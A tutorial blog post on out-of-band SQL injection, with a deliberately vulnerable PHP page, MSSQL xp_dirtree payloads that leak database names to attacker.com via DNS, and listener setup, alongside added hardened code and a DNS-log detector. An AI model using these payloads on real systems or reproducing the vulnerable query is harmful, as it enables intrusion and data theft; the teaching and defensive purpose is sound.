Thilan Dissanayaka Web App Hacking Apr 26

Out of Band SQL Injection

What is Out-of-Band (OOB) SQL Injection?

Normally in SQL Injection, the attacker:

Sees direct errors, or

Infers information through page behavior or timing.

But Out-of-Band SQL Injection is different:

OOB SQLi relies on making the vulnerable database itself initiate a network connection (such as an HTTP request or a DNS lookup) to an attacker-controlled server, and the data is leaked inside that connection.

This is useful when:

Errors are hidden,

The page behaves the same whether the query succeeds or fails, and

There are no usable timing differences.

Example:

The vulnerable server sends a DNS or HTTP request to attacker.com containing database data.

How Out-of-Band SQL Injection Works

Some databases have functions that allow making external network connections:

Database               Functions
MySQL                  LOAD_FILE(), INTO OUTFILE, xp_dirtree() (when MySQL is linked to MSSQL)
Microsoft SQL Server   xp_dirtree(), xp_fileexist()
Oracle                 UTL_HTTP.REQUEST, UTL_INADDR.GET_HOST_ADDRESS

An attacker can exploit these features to:

Force a DNS lookup

Trigger an HTTP request

Leak data through those requests.

Real-World Example Setup

Imagine a PHP page like:

<?php
// $conn is assumed to be an already opened mysqli connection.
$id = $_GET['id'];
// The raw query-string value is concatenated straight into the SQL text,
// so a quote in ?id= ends the string literal and the rest is executed as SQL.
$query = "SELECT name, price FROM products WHERE id = '$id'";
$result = mysqli_query($conn, $query);
// Errors are never shown: a failed query simply produces no output.
if ($result && mysqli_num_rows($result) > 0) {
    $row = mysqli_fetch_assoc($result);
    echo "Product Name: " . $row['name'];
}
?>

Problems:

User input is directly injected into SQL

No output-based or time-based feedback
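The same lookup written so that the query text can never be changed by user input, as an added example (not code from the original post). It keeps the post's assumption that $conn is an existing mysqli connection; the function name fetchProduct is this example's own choice.

```php
<?php
// Added example: hardened version of the product lookup.
// Assumes $conn is an existing mysqli connection, as in the original snippet.

function fetchProduct(mysqli $conn, string $rawId): ?array
{
    // 1. Validate the shape of the input first. Product ids are integers, and
    //    filter_var() returns false for anything else, so a value such as
    //    "'; EXEC master..xp_dirtree ..." is rejected before any SQL runs.
    $id = filter_var($rawId, FILTER_VALIDATE_INT);
    if ($id === false || $id < 1) {
        return null;
    }

    // 2. Use a prepared statement. The statement text is fixed and sent to the
    //    server before the value is bound, so the value is only ever data and
    //    cannot terminate the string literal or append a second statement.
    $stmt = $conn->prepare('SELECT name, price FROM products WHERE id = ?');
    if ($stmt === false) {
        // Log server-side; do not echo $conn->error to the client.
        return null;
    }
    $stmt->bind_param('i', $id);
    $stmt->execute();

    // bind_result()/fetch() works without the mysqlnd driver, unlike get_result().
    $stmt->bind_result($name, $price);
    $row = $stmt->fetch() ? ['name' => $name, 'price' => $price] : null;
    $stmt->close();

    return $row;
}

$row = fetchProduct($conn, $_GET['id'] ?? '');
if ($row !== null) {
    // 3. Encode output for HTML so a stored name cannot inject markup either.
    echo 'Product Name: ' . htmlspecialchars($row['name'], ENT_QUOTES, 'UTF-8');
} else {
    echo 'Product not found';
}
```

Parameterisation removes the injection itself. Two further layers limit what an injection could do if one slipped through elsewhere: the application's database login should not be allowed to execute procedures such as xp_dirtree or xp_fileexist, and the database host should not be able to resolve arbitrary external names or open outbound connections to the internet, since that outbound path is exactly what the out-of-band channel depends on.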

Example OOB SQL Injection Exploit

Assume the database is Microsoft SQL Server and the database host has access to the internet. We can use the function xp_dirtree() to trigger a network request.

Injection payload:


'; EXEC master..xp_dirtree '\\attacker.com\test' --

Full URL:

http://victim.com/product.php?id='; EXEC master..xp_dirtree '\\attacker.com\test'--

What happens?

The database server tries to list the contents of the share \\attacker.com\test

A DNS lookup happens for attacker.com

The attacker sees the request and knows the SQL injection worked!

Another Example: Leaking Data

You can even exfiltrate data!

Example payload:

'; EXEC master..xp_dirtree '\\' + (SELECT TOP 1 name FROM master..sysdatabases) + '.attacker.com\abc' --

If the first database name is 'testdb', the resulting UNC path is \\testdb.attacker.com\abc, so the database server will try to resolve:

testdb.attacker.com

If you monitor your domain’s DNS logs, you can see the database name!
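The same DNS log, seen from the defender's side. This added example (not part of the original post) scans DNS query log lines and reports any lookup made by the database server to a domain outside an allowlist; the leftmost label is reported separately because that is where leaked data lands (for example "testdb" in testdb.attacker.com). The log format, the database host address 10.0.0.25 and the allowed domains are constructed assumptions for the example. Requires PHP 8 for str_ends_with().

```php
<?php
// Added example: flag DNS lookups from a database host that do not belong to
// an allowlisted domain. Log lines are constructed in a simplified
// "timestamp client query" format; addresses and names are assumptions.

const DB_SERVER_IPS   = ['10.0.0.25'];                 // assumed address of the SQL host
const ALLOWED_SUFFIXES = ['corp.example', 'ntp.org'];  // names the DB host may legitimately resolve

/** Parse one log line into ['ts', 'client', 'query'], or null if malformed. */
function parseDnsLine(string $line): ?array
{
    if (!preg_match('/^(\S+)\s+(\S+)\s+(\S+)$/', trim($line), $m)) {
        return null;
    }
    // Normalise case and drop a trailing dot so "attacker.com." matches "attacker.com".
    return ['ts' => $m[1], 'client' => $m[2], 'query' => strtolower(rtrim($m[3], '.'))];
}

/** True when the query name is, or is a subdomain of, an allowed parent domain. */
function isAllowedDomain(string $query, array $suffixes): bool
{
    foreach ($suffixes as $suffix) {
        if ($query === $suffix || str_ends_with($query, '.' . $suffix)) {
            return true;
        }
    }
    return false;
}

/**
 * Return the entries that look like an out-of-band channel: a query from a
 * database server to a domain that is not on the allowlist.
 */
function findSuspiciousLookups(array $lines, array $dbHosts, array $suffixes): array
{
    $hits = [];
    foreach ($lines as $line) {
        $entry = parseDnsLine($line);
        if ($entry === null || !in_array($entry['client'], $dbHosts, true)) {
            continue;                       // malformed, or not from a DB host
        }
        if (isAllowedDomain($entry['query'], $suffixes)) {
            continue;                       // expected internal/NTP traffic
        }
        $labels = explode('.', $entry['query']);
        $hits[] = [
            'ts'           => $entry['ts'],
            'query'        => $entry['query'],
            'leaked_label' => $labels[0],                            // where exfiltrated data ends up
            'parent'       => implode('.', array_slice($labels, -2)), // registrable domain to block/investigate
        ];
    }
    return $hits;
}

// Constructed sample: two benign lookups and two matching the post's payloads.
$sampleLog = [
    '2025-04-26T10:00:01Z 10.0.0.25 dc01.corp.example',
    '2025-04-26T10:00:02Z 10.0.0.40 www.example.net',
    '2025-04-26T10:00:03Z 10.0.0.25 attacker.com.',
    '2025-04-26T10:00:04Z 10.0.0.25 testdb.attacker.com',
];

foreach (findSuspiciousLookups($sampleLog, DB_SERVER_IPS, ALLOWED_SUFFIXES) as $hit) {
    printf("%s  DB host resolved %s (leftmost label: %s, parent: %s)\n",
        $hit['ts'], $hit['query'], $hit['leaked_label'], $hit['parent']);
}
```

The rule is deliberately simple: a database server has a small, predictable set of names it should ever need to resolve, so anything outside that set from that source address is worth an alert regardless of what the label contains. Running the sample reports the two attacker.com lookups and ignores the domain controller and the workstation's web browsing.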

Setting Up the Attacker's Server

You need to set up:

A DNS listener (example: using tcpdump, dnsmasq, Burp Collaborator, or Interactsh)

Or a web server to catch HTTP requests.

A simple way to catch DNS queries with tcpdump:

sudo tcpdump -i eth0 port 53

Or use public services like:

Interactsh (by Project Discovery)

Burp Collaborator client

They give you a domain like random.oastify.com, and log incoming requests.

